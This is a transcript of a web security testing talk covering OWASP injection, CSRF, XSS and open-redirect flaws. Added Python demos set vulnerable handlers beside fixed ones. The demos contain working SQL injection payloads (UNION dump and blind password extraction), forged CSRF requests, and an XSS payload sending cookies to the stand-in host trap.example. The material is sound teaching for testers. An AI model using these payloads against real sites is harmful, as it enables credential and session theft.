"web applications security testing" by kirill semenov for lohika odessa qa techtalks


Upload: lohikaodessatechtalks

Posted on 17-Jul-2015


Category: Education



TRANSCRIPT

WEB applications security testing

Semenov Kirill, COST engineer

Agenda

• Basic principles of security discredit
  – Security testing essentials
  – WEB applications security
  – HTTP overview
• Server side vulnerability
• Client side vulnerability
• SOAP API and JSON API

Part I – Basic principles of security discredit

Security testing essentials


Particle NOT


WEB applications security

[Diagram: What can be attacked? Client – Network – Server]

WEB applications security: Organizations

WEB applications security: Instruments

HTTP

[Diagram: Browser –(X)HTTP(S)→ WEB Server + Logics Server → DBMS (SQL) and OS (commands, files)]

Part II – Server side vulnerability

The A-numbers below follow the OWASP Top 10 (2013 edition).

• A1 – Injection:
  – SQL injection
  – File injection
  – Code injection
• A2 – Broken Authentication and Session Management
• A4 – Insecure Direct Object Reference
• A8 – Cross-Site Request Forgery (CSRF)

A1 – Injection: What happens on a Server?

A1 – Injection: Main types of Injections

A1 – Injection: SQL Injection Types

A1 – Injection: How it works – UNION injection

A1 – Injection: How it works – Blind injection

A1 – Injection: How to protect?
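
The UNION and blind techniques named in the slides above, together with the parameterised-query fix from "How to protect?", as an added worked example that is not part of Kirill's deck. It uses Python's built-in sqlite3 module against a constructed in-memory database: the products/users tables, the admin/s3cret credentials and the `search_*` handlers are invented for the demo. The same payload shapes apply to any SQL dialect with UNION and a substring function.

```python
import sqlite3

# Constructed demo schema (not from the deck): the application searches
# products by category; users holds the credentials the attacker is after.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, category TEXT);
        CREATE TABLE users(id INTEGER, login TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'Keyboard', 'hardware'),
                                    (2, 'Mouse', 'hardware'),
                                    (3, 'IDE licence', 'software');
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'kirill', 'qa-pass');
    """)
    return conn


def search_vulnerable(conn, category):
    # VULNERABLE: the request parameter is pasted into the statement text,
    # so a quote in it ends the string literal and the rest becomes SQL.
    sql = "SELECT name FROM products WHERE category = '%s'" % category
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, category):
    # PROTECTED: a parameterised query. The value travels separately from
    # the statement, so the driver never interprets it as SQL.
    sql = "SELECT name FROM products WHERE category = ?"
    return [row[0] for row in conn.execute(sql, (category,))]


# UNION injection: close the literal, append a SELECT with the same number
# of columns, and comment out the original closing quote. The foreign rows
# come back in the normal result list.
UNION_PAYLOAD = "x' UNION SELECT login || ':' || password FROM users -- "


def blind_oracle(conn, category):
    # Blind injection: the page shows no data, only whether the query
    # matched. Here the oracle is "did the search return any rows?".
    return len(search_vulnerable(conn, category)) > 0


def blind_extract_password(conn, login,
                           charset="abcdefghijklmnopqrstuvwxyz0123456789-",
                           max_len=16):
    # Recover users.password one character at a time by asking the oracle
    # yes/no questions of the form AND substr(password, i, 1) = 'c'.
    recovered = ""
    for pos in range(1, max_len + 1):
        matched = None
        for ch in charset:
            probe = ("hardware' AND (SELECT substr(password,%d,1) FROM users "
                     "WHERE login='%s') = '%s' -- " % (pos, login, ch))
            if blind_oracle(conn, probe):
                matched = ch
                break
        if matched is None:   # substr past the end returns '' -> no match
            break
        recovered += matched
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("normal search:   ", search_vulnerable(db, "hardware"))
    print("UNION dump:      ", search_vulnerable(db, UNION_PAYLOAD))
    print("same, protected: ", search_safe(db, UNION_PAYLOAD))
    print("blind extraction:", blind_extract_password(db, "admin"))
```

Two things to carry over to a real target: the UNION branch must return the same number of columns as the original SELECT (probe with `UNION SELECT NULL, NULL, ...` until the error disappears), and the comment sequence differs by DBMS (`-- ` and `/* */` are widely accepted; MySQL also takes `#`).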

A1 – Injection: How to attack?

A1 – Injection: File Injection

A1 – Injection: Code & Command Injection

A2 – Authentication and Session Management

A4 – Insecure Direct Object Reference

A8 – Cross Site Request Forgery

[Diagram: XSS – trap and victim on the same site; CSRF – trap on Site1 drives the victim's browser to Site2]
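
An added example, not from the deck, of the situation the CSRF diagram describes: the victim's browser attaches the session cookie to a request that the trap site forged, so a handler that authenticates by cookie alone cannot tell the forged request from a genuine one. The bank site, session table, request dictionaries and token scheme are constructed for the demo; the defence shown is a per-session synchroniser token plus an Origin-header check.

```python
import hashlib
import hmac
import secrets

# Constructed demo state (not from the deck): one logged-in victim, one
# session cookie, and a server-side key used to derive per-session tokens.
SITE_ORIGIN = "https://bank.example"
SERVER_KEY = secrets.token_bytes(32)
SESSIONS = {"sid-victim-1": "victim"}


def issue_csrf_token(session_id, key=SERVER_KEY):
    # Synchroniser token bound to the session. The trap site cannot compute
    # it: it knows neither the key nor (with HttpOnly) the cookie value.
    return hmac.new(key, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, submitted, key=SERVER_KEY):
    expected = issue_csrf_token(session_id, key)
    return hmac.compare_digest(expected, submitted or "")  # constant-time


def transfer_vulnerable(req, balances, sessions=SESSIONS):
    # VULNERABLE: authorisation rests on the cookie alone. The browser adds
    # the cookie to the trap's auto-submitted form exactly as to a real one.
    user = sessions.get(req["cookies"].get("sid"))
    if user is None:
        return "401 not logged in"
    amount, to = int(req["form"]["amount"]), req["form"]["to"]
    balances[user] -= amount
    balances[to] = balances.get(to, 0) + amount
    return "200 transferred"


def transfer_safe(req, balances, sessions=SESSIONS, site_origin=SITE_ORIGIN):
    # PROTECTED: (1) reject a cross-site Origin, (2) require the session's
    # token in the form body, and only then move money.
    sid = req["cookies"].get("sid")
    user = sessions.get(sid)
    if user is None:
        return "401 not logged in"
    origin = req["headers"].get("Origin")
    if origin is not None and origin != site_origin:
        return "403 cross-site origin"
    if not verify_csrf_token(sid, req["form"].get("csrf_token")):
        return "403 missing or wrong csrf token"
    amount, to = int(req["form"]["amount"]), req["form"]["to"]
    balances[user] -= amount
    balances[to] = balances.get(to, 0) + amount
    return "200 transferred"


def genuine_request(sid="sid-victim-1"):
    # The victim submits the bank's own form, which embeds the token.
    return {"cookies": {"sid": sid},
            "headers": {"Origin": SITE_ORIGIN},
            "form": {"to": "friend", "amount": "10",
                     "csrf_token": issue_csrf_token(sid)}}


def forged_request(sid="sid-victim-1"):
    # The trap page auto-submits a form to the bank: the browser attaches the
    # victim's cookie, the Origin header names the trap, no token is known.
    return {"cookies": {"sid": sid},
            "headers": {"Origin": "https://trap.example"},
            "form": {"to": "attacker", "amount": "1000"}}


if __name__ == "__main__":
    for handler in (transfer_vulnerable, transfer_safe):
        balances = {"victim": 1000}
        print(handler.__name__, handler(forged_request(), balances), balances)
```

The Origin check is a second line of defence rather than a replacement for the token: some requests arrive without an Origin header, which is why the safe handler tolerates its absence but never tolerates a missing token. Marking the session cookie `SameSite=Lax` or `Strict` stops the browser attaching it to the trap's POST in the first place.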

Part III – Client side vulnerability

• A3 – Cross-Site Scripting (XSS)
  o stored
  o reflected
• A10 – Unvalidated Redirects

What happens on Client (Browser)?

A3 – XSS

XSS: execution of malicious JavaScript code inside the session of an authorized user who has higher privileges than the attacker.

[Diagram: path of user data, Browser –(X)HTTP(S)→ WEB Server + Logics Server → DBMS (SQL) / OS (commands, files); Stored vs Reflected XSS]

A3 – XSS: How to attack?

A3 – XSS: How to protect?
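
Stored and reflected XSS in the two output contexts a tester meets most often (HTML text and a quoted attribute value), each beside the output-encoding fix, as an added Python example that is not part of the deck. The search page, comment store and profile form are constructed for the demo; the encoding is done with the standard library's `html.escape`.

```python
import html

# Constructed demo pages (not from the deck). Each render_* function returns
# the HTML fragment the server would send for the given user-controlled input.


def render_search_vulnerable(query):
    # REFLECTED XSS: the query from the URL is echoed straight into HTML text.
    return "<p>Results for: %s</p>" % query


def render_search_safe(query):
    # PROTECTED: HTML-encode on output. < > & " ' become entities, so the
    # browser displays them instead of parsing them.
    return "<p>Results for: %s</p>" % html.escape(query, quote=True)


def post_comment(store, text):
    # STORED XSS: the payload is saved once and replayed to every later
    # visitor, including users with higher privileges than the author.
    store.append(text)


def render_comments_vulnerable(store):
    return "<ul>" + "".join("<li>%s</li>" % c for c in store) + "</ul>"


def render_comments_safe(store):
    return "<ul>" + "".join("<li>%s</li>" % html.escape(c, quote=True)
                            for c in store) + "</ul>"


def render_profile_vulnerable(display_name):
    # Attribute context: a double quote in the value closes the attribute and
    # lets the attacker add an event handler; no <script> tag is needed.
    return '<input name="display" value="%s">' % display_name


def render_profile_safe(display_name):
    # quote=True is what makes html.escape safe inside a quoted attribute.
    return '<input name="display" value="%s">' % html.escape(display_name, quote=True)


# Constructed payloads: one for text context, one for attribute context.
SCRIPT_PAYLOAD = "<script>new Image().src='https://trap.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


def payload_survives(page, payload):
    # Tester's check: does the payload appear in the response unencoded?
    return payload in page


if __name__ == "__main__":
    print(render_search_vulnerable(SCRIPT_PAYLOAD))
    print(render_search_safe(SCRIPT_PAYLOAD))
    print(render_profile_vulnerable(ATTR_PAYLOAD))
    print(render_profile_safe(ATTR_PAYLOAD))
```

Encoding is context-specific: `html.escape` is right for HTML text and quoted attributes, but data placed inside a `<script>` block, a URL or a CSS value needs the encoder for that context, and an unquoted attribute cannot be made safe by encoding at all. A `Content-Security-Policy` without `unsafe-inline` and an `HttpOnly` session cookie limit what a payload that does get through can achieve.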

A3 – XSS: Q&A

A10 – Unvalidated redirects

Example: http://gmail.com/redirect.jsp?url=http://gmeil.com

[Diagram: the victim follows a link on the valid host (gmail.com) and lands on the trap at the invalid host (gmeil.com), which shows the same interface]
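
The redirect.jsp example above, worked through as added Python code that is not from the deck: a handler that trusts `url` as given beside one that resolves the target against the site's own origin and accepts only an allow-listed host. The allow-list (gmail.com, mail.google.com) and the handler names are invented for the demo; the test URLs cover the bypasses a tester should try against a redirect parameter (protocol-relative `//host`, userinfo `@`, look-alike subdomains, `javascript:` and backslashes).

```python
from urllib.parse import urljoin, urlsplit

SITE_BASE = "https://gmail.com/"                   # constructed: the site's own origin
ALLOWED_HOSTS = {"gmail.com", "mail.google.com"}   # constructed allow-list


def redirect_vulnerable(url):
    # VULNERABLE: whatever arrives in ?url= becomes the Location header.
    return url


def is_safe_redirect(url, allowed_hosts=ALLOWED_HOSTS, base=SITE_BASE):
    # Browsers treat backslashes as slashes and tolerate control characters;
    # urlsplit does not, so refuse them outright instead of reasoning about them.
    if "\\" in url or any(ord(c) < 0x20 or c == "\x7f" for c in url):
        return False
    # Resolve relative targets ("/inbox") against our own origin. A
    # protocol-relative "//gmeil.com" then resolves to a foreign host, not a path.
    parts = urlsplit(urljoin(base, url))
    if parts.scheme not in ("http", "https"):     # blocks javascript:, data:, ...
        return False
    # .hostname drops userinfo and port and lowercases, so
    # "http://gmail.com@gmeil.com/" is judged by gmeil.com, not gmail.com.
    return (parts.hostname or "") in allowed_hosts


def redirect_safe(url, fallback="/"):
    # PROTECTED: only allow-listed hosts; everything else goes to a known page.
    return url if is_safe_redirect(url) else fallback


# Constructed probe URLs a tester would feed to redirect.jsp?url=
TEST_URLS = [
    "http://gmeil.com",                    # the deck's look-alike host
    "http://gmail.com/inbox",
    "/inbox",
    "//gmeil.com/login",
    "http://gmail.com@gmeil.com/",
    "http://gmail.com.gmeil.com/",
    "javascript:alert(document.cookie)",
    "http://GMAIL.COM/x",
    "\\\\gmeil.com",
]

if __name__ == "__main__":
    for u in TEST_URLS:
        print("%-36s vulnerable -> %-36s safe -> %s"
              % (u, redirect_vulnerable(u), redirect_safe(u)))
```

Matching on the exact hostname is deliberate: a substring or prefix test (`url.startswith("http://gmail.com")`) is passed by `gmail.com.gmeil.com` and by `gmail.com@gmeil.com`, which is exactly the look-alike trick the slide's gmeil.com example illustrates.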

Part IV – SOAP API & JSON API

Architecture

SOAP UI
• SoapUI is a free and open source cross-platform Functional Testing solution
• http://www.soapui.org/about-soapui/what-is-soapui-.html

Q&A

Thank You!